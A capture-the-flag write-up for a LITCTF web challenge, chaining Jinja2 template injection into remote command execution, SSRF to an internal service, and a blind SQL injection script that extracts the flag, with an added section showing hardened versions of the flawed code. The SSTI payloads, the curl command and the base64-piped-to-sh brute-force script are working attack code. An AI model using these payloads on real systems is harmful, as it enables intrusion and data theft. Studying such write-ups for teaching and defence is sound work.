Tags: sqlinjection web ssrf ssti 

Rating: 5.0

This challenge has several vulnerabilities. The first is in the password field.

If you check the code, you will notice an SSTI vulnerability: the password is concatenated directly into the template source.

```python
return render_template_string("ok thank you for your info i have now sold your password (" + password + ") for 2 donuts :)");
```
For example, if you enter the following payload as the password
```
{{2+2}}
```
the response contains:
```
4
```
There is also a SQL injection vulnerability in the `data-server` project, where both fields are concatenated into the query string:
```python
x = "SELECT * FROM users WHERE username='" + username + "' AND password='" + password + "'"
```
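The two bugs above, each beside a hardened form, as an added example that is not the challenge's own code. It uses Jinja2 directly (the engine behind Flask's `render_template_string`) and an in-memory SQLite table with constructed rows, since the real `data-server` schema is not on the page.

```python
# Added example: template-source concatenation and query-string concatenation
# (as in the challenge) next to a fixed version of each.
import sqlite3
from jinja2 import Environment

env = Environment(autoescape=True)
PREFIX = "ok thank you for your info i have now sold your password ("
SUFFIX = ") for 2 donuts :)"

def render_vulnerable(password: str) -> str:
    # As in the challenge: user input becomes part of the template *source*,
    # so any {{ ... }} expression inside it is evaluated by Jinja2.
    return env.from_string(PREFIX + password + SUFFIX).render()

def render_fixed(password: str) -> str:
    # Hardened: the template source is constant; user input arrives only as a
    # context value, so "{{2+2}}" is echoed back verbatim, not evaluated.
    return env.from_string(PREFIX + "{{ password }}" + SUFFIX).render(password=password)

def make_db() -> sqlite3.Connection:
    # Constructed sample data (not the real users table).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('flag', 'not-the-real-flag')")
    conn.execute("INSERT INTO users VALUES ('o''brien', 'pw')")
    return conn

def query_vulnerable(conn, username: str, password: str):
    # As in the challenge: a quote in either field changes the SQL itself.
    x = "SELECT * FROM users WHERE username='" + username + "' AND password='" + password + "'"
    return conn.execute(x).fetchall()

def query_fixed(conn, username: str, password: str):
    # Hardened: bound parameters, so the inputs are always data, never syntax.
    x = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(x, (username, password)).fetchall()

def quote_breaks_vulnerable(conn, username: str, password: str) -> bool:
    # True when the concatenated query no longer parses for this input, i.e.
    # the input escaped the string literal; the parameterised query never does.
    try:
        query_vulnerable(conn, username, password)
        return False
    except sqlite3.OperationalError:
        return True
```

A legitimate username containing an apostrophe is enough to break the concatenated query, which is the same defect the writeup's SQL payload relies on.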
Now we use the SSTI to execute a command:
```jinja
{{config['__class__']['__init__']['__globals__']['os']|attr('popen')('ls')|attr('read')()}}
```
```shell
curl -X POST "http://litctf.live:31781" -d "username=&password={{config['__class__']['__init__']['__globals__']['os']|attr('popen')('ls')|attr('read')()}}"

ok thank you for your info i have now sold your password (main.py
requirements.txt
run.sh
static
templates
) for 2 donuts :)
```

If we print `main.py`, we find the address `http://172.24.0.8:8080/runquery`. This address is not reachable from outside, so the `data-server` program cannot be accessed directly; the only way to reach it is through the web server we already control (SSRF).

In the next step, we send requests containing SQL to `http://172.24.0.8:8080/runquery` from inside the web server's container:

```python
import requests
import base64

# candidate characters for the flag, tried in this order
char = list(".*+,!#$%&0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-{}")

url = "http://litctf.live:31781"
internal_url = "http://172.24.0.8:8080/runquery"

# SSTI template: runs a shell command via os.popen and returns its output
ssti_payload = "{{config['__class__']['__init__']['__globals__']['os']|attr('popen')('%s')|attr('read')()}}"
# the command is base64-encoded so that no '.' reaches the filtered field
rce_payload = "echo {}| base64 -d | sh"
# there is no curl on the server, so the internal request is made with python
python_script = "python3 -c \"import json,requests;print(requests.post('%s', data=json.dumps({'username':'%s','password':'0'}), headers={\\\"Content-type\\\": \\\"application/json\\\"}).text)\""
# boolean-based SQL injection: compares one prefix of the password column
sql_payload = "flag\\'and (Select hex(substr(password,1,{})) from users limit 1 offset 0) = hex(\\\'{}\\\')--"

flag = "LITCTF{"

for _ in range(len(char)):          # one iteration per recovered flag character
    for i in range(len(char)):
        tmp = flag + char[i]

        script = python_script % (internal_url, sql_payload.format(len(flag) + 1, tmp))
        script = str(base64.b64encode(script.encode("utf-8")), "utf-8")
        payload = ssti_payload % rce_payload.format(script)

        r = requests.post(url, data={"username": "", "password": payload})
        if "True" in r.text:        # data-server answered True: prefix matched
            flag += char[i]
            print("FLAG : " + flag)
            break
```
A few points about the script above:
* Because there is no `curl` on the server, we had to use a Python script to send the internal request.
* The server filters the character `.`; to bypass this filter I base64-encoded the script.

```
LITCTF{flush3d_3m0ji_o.0}
```